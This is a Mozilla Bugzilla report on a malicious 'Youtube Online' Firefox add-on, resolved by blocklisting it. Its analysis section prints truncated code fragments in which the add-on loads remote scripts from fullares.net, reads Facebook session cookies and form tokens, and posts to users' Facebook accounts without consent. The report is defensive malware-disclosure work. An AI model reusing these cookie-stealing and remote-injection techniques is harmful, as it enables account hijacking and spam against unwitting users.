Last Comment Bug 728476 - Malicious "Youtube Online" add-on
: Malicious "Youtube Online" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-02-17 16:14 PST by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
facebookmusica.com.output.zip (31.04 KB, application/octet-stream)
2012-02-17 16:14 PST, MarkH
no flags Details

Description MarkH 2012-02-17 16:14:49 PST
Created attachment 598422 [details]
facebookmusica.com.output.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

Steps to reproduce:

Downloaded the add-on from http://facebookmusica.com/youtube.xpi


Actual results:

Report for http://facebookmusica.com/youtube.xpi

** Embedded and Remote Files **

chrome.manifest
content/prefman.js
content/skin/icon.png
content/script-compiler.js
content/youtube.js
http://fullares.net/campanita/script.js
http://fullares.net/campanita/extra.js
content/xmlhttprequester.js
content/script-compiler-overlay.xul
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
install.rdf


** Embedded Metadata **

<em:name>Youtube Online</em:name>
<em:version>1.4.0</em:version>
<em:targetApplication>
<em:minVersion>2.0</em:minVersion>
<em:maxVersion>10.*</em:maxVersion>
</em:targetApplication>
<em:creator>YOUTU</em:creator>
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
<em:description>Ve videos youtube mas rapido y ligero</em:description>
<em:homepageURL>http://poringa.me/</em:homepageURL>
<em:updateURL>http://http/://poringa.me/update.rdf</em:updateURL>
...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR
0YC1g/Mo...


** Files Loaded **

...overlay	chrome://browser/content/browser.xul	chrome://youtube/content/sc
ript-com...
'chrome://youtube/content/youtube.js'
...pt type='application/x-javascript'
src='chrome://youtube/content/youtube.js'></s...
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>


** Remote Javascript Loaded **

...nt/browser.xul	chrome://youtube/content/script-compiler-overlay.xul
var	scriptableStream=Components
.classes["@mozilla.org/scriptableinputstream;1"]
.getService(Components.interfaces.nsIScriptableInputStream);
.classes["@mozilla.org/intl/scriptableunicodeconverter"]
.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
scriptableStream.init(input);
var	str=scriptableStream.read(input.available());
scriptableStream.close();
var script=youtube_gmCompiler.getUrlContents(
youtube_gmCompiler.injectScript(script, href, unsafeWin);
injectScript: function(script, url, unsafeContentWin) {
var sandbox, script, logger, storage, xmlhttpRequester;
var storage=new youtube_ScriptStorage();
"(function(){"+script+"})()",
e2.fileName=script.filename;
function youtube_ScriptStorage() {
youtube_ScriptStorage.prototype.setValue = function(name, val) {
youtube_ScriptStorage.prototype.getValue = function(name, defVal) {
loadScript_you();
function loadScript_you() {
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://fullares.net/campanita/script.js");
function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://fullares.net/campanita/extra.js");
...ppendChild|cl|oo|createElement|function|script|onload|no|javascript|type
|js|php|...
var a = document.getElementsByTagName('script')[0];
addScript();
// this function gets called by user scripts in content security scope to
...eymaster/gatekeeper/there.is.only.xul'><script
type='application/x-javascript' s...
<Description about="urn:mozilla:install-manifest">
<Description>
</Description>
<em:description>Ve videos youtube mas rapido y ligero</em:description>
</Description>


** Facebook Paths Accessed **

...(location.href.match(/^http:\/\/(www\.)?facebook.com/i)){
window.location = 'htt...
...=new
XMLHttpRequest();gf['open']('GET','/ajax/typeahead/first_degree.php?__a=1&f
...
...=new XMLHttpRequest();var
d='http://www.facebook.com/ajax/profile/composer.php?_...
...(location.href.match(/^http:\/\/(www\.)?facebook.com/i)){var
cook=readCookie("fv...


** Facebook Cookies Accessed **

...n fb_comparte(){var user_id=readCookie('c_user');var
uid=user_id;if(document['ge...
...yName']('post_form_id')[0]['value'];var
fb_dtsg=document['getElementsByName']('f...
...g';var
e='post_form_id='+post_form_id+'&fb_dtsg='+fb_dtsg+'&xhpc_composerid=u574..
.
...var user_id=readCookie('c_user');if(user_id==null)return
false;cook=readCookie("...


** HTTP Requests **

...n video??'];var message='';var a;gf=new
XMLHttpRequest();gf['open']('GET','/ajax...
...randomValue(p3)]['join'](' ');var c=new XMLHttpRequest();var
d='http://www.faceb/...
var req = new this.chromeWindow.XMLHttpRequest();


** All URLs Loaded or Mentioned **

// http://www.letitblog.com/code/python/greasemonkey.py.txt
// http://greasemonkey.devjavu.com/
....)?facebook.com/i)){ window.location =
'http://poringa.me/facebook.html'; }
blogs[0] = 'http://www.quebuenamusica.org/campanita/';
blogs[1] = 'http://bit.ly/uDUmmB';
blogs[2] = 'http://bit.ly/s7SPp7';
...){ifra.style.marginLeft="0px";ifra.src="http://voltor.info/video/video.h
tml"}
...L='<iframe id="change" width="500"
src="http://fullares.net/campanita/unlock.php...
...alue'];var video_url=blog;var
domains=['http://i40.tinypic.com/8zenw6.png'];var ...
...(' ');var c=new XMLHttpRequest();var
d='http://www.facebook.com/ajax/profile/com...
s.setAttribute("src", "http://fullares.net/campanita/extra.js");
s.setAttribute("src", "http://fullares.net/campanita/script.js");
...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul<
/code></...
...<dd><a
href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/.
..
...<?xml version="1.0"?><overlay
xmlns='http://www.mozilla.org/keymaster/gatekeeper...
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<em:homepageURL>http://poringa.me/</em:homepageURL>
<em:updateURL>http://http/://poringa.me/update.rdf</em:updateURL>


Expected results:

It should not steal your Facebook cookies and post to Facebook without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-02-18 09:09:30 PST
ID: youtube2@youtube2.com
Comment 2 Jorge Villalobos [:jorgev] 2012-02-18 09:10:50 PST
https://addons.mozilla.org/en-US/firefox/blocked/i67

Note You need to log in before you can comment on or make changes to this bug.